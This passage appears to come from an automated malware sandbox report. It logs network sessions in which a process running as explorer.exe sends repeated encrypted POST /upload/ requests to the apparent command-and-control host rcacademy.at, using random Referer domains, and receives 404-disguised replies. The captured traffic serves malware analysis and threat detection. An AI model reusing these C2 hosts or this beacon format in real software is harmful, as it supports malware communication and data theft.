                                                                                                                                  Content-Length: 265
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:57.089068890 CET10351OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 74 3d ab 99
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vut=_zopm2"m<Ku1y&\ed(RZG+, xUUC!"#']:kwCe|l!Pg'RA
                                                                                                                                  Dec 18, 2021 15:31:57.808521032 CET10459INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:57 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.649785148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:58.001878977 CET10461OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://svlbtjow.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 203
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:58.001887083 CET10461OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 7f 5c d8 e0
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu\Y"hQy-P|)`J|J^5WL"+]QD[%i?^Mb+c5
                                                                                                                                  Dec 18, 2021 15:31:58.761156082 CET10570INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:58 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  15192.168.2.649791222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:59.094274998 CET10700OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nrenwf.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 176
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:59.094327927 CET10700OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 42 50 eb 87
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuBP3oRK~*0y9n68[-j*,B:GI2veN5sWNF
                                                                                                                                  Dec 18, 2021 15:32:00.324103117 CET10711INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:59 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 102
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 6e 48 ba 3c 03 e8 fb 48 e1 9a e3 ba 32 da 2d da f5 6c 5b 01 98 8b 8c c6 69 d1 30 01 00 d0 5b d8 08 32 04 07 eb cf 24 a0 28 fb 11 53 41 23 77 4d da 6a bb 77 4a ee 9b 21 34 9d 65 d6 f1 e0 66 21 c6 1d e1 15 f3 e7 48 02 0d 6d 92 09 eb b7 c9 49 d3
                                                                                                                                  Data Ascii: #\6nH<H2-l[i0[2$(SA#wMjwJ!4ef!HmI


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  16192.168.2.649803190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:03.974551916 CET11487OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://kliyespolk.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 245
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:03.974584103 CET11487OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 3e 2e ac bd
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA ,[k,vu>.M7tax;|V+oY\"!{SMJg%GBm -xXm]EAM[mZC\,nbXPbk|\9
                                                                                                                                  Dec 18, 2021 15:32:06.856286049 CET17599INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:06 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  17192.168.2.649822218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:07.146100044 CET20001OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hjmjrvm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 242
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:07.146483898 CET20002OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 25 46 fb 84
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu%Faaw~R"0IDj,,}-JX[fHfO#bEf,{N|$_Q22vg!r:Jze)2S
                                                                                                                                  Dec 18, 2021 15:32:08.333070993 CET20011INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:07 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  18192.168.2.649827222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:08.641693115 CET20012OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tvgdwnrq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 196
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:08.641732931 CET20012OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 66 05 be f5
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuf<j`NYpD#%eUW1]fc;%_Bg8Cs#64W;+3le-T
                                                                                                                                  Dec 18, 2021 15:32:09.862582922 CET20013INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:09 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  19192.168.2.649828218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:10.118962049 CET20014OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bhqvtkcroe.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 154
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:10.118979931 CET20014OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3a 40 c7 a8
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu:@s.aus/YD5k35p9\"l9;7B1S:
                                                                                                                                  Dec 18, 2021 15:32:11.255882978 CET20015INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:10 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.64983150.62.140.96443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  20192.168.2.649829218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:11.532268047 CET20016OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wayrnqsako.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 306
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:11.532313108 CET20016OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2d 1d f8 80
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu-|!orYrRj4/w 5q~(RYl'F1TPK}<]KG?E*5EIoyvQMw$Qqrg
                                                                                                                                  Dec 18, 2021 15:32:12.696820021 CET20017INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:12 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 58
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 09 6b 55 e0 31 04 e8 fb 52 e0 8a ed a7 24 95 2c 9b fb 2c 57 5a 9a 8f 83 ca 6b d8 31 07 16 d0 11 89 5a 28 56 4c b8
                                                                                                                                  Data Ascii: #\6kU1R$,,WZk1Z(VL


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  21192.168.2.649833218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:15.618463993 CET20041OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ayamwyb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 243
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:15.618493080 CET20042OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 56 24 cb a5
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuV$5trJfOKOt?JJ"2|_S*[SQ1I54%]_d#Kko4M*.nu}X`!v[qrIC
                                                                                                                                  Dec 18, 2021 15:32:16.519921064 CET20042INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:16 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
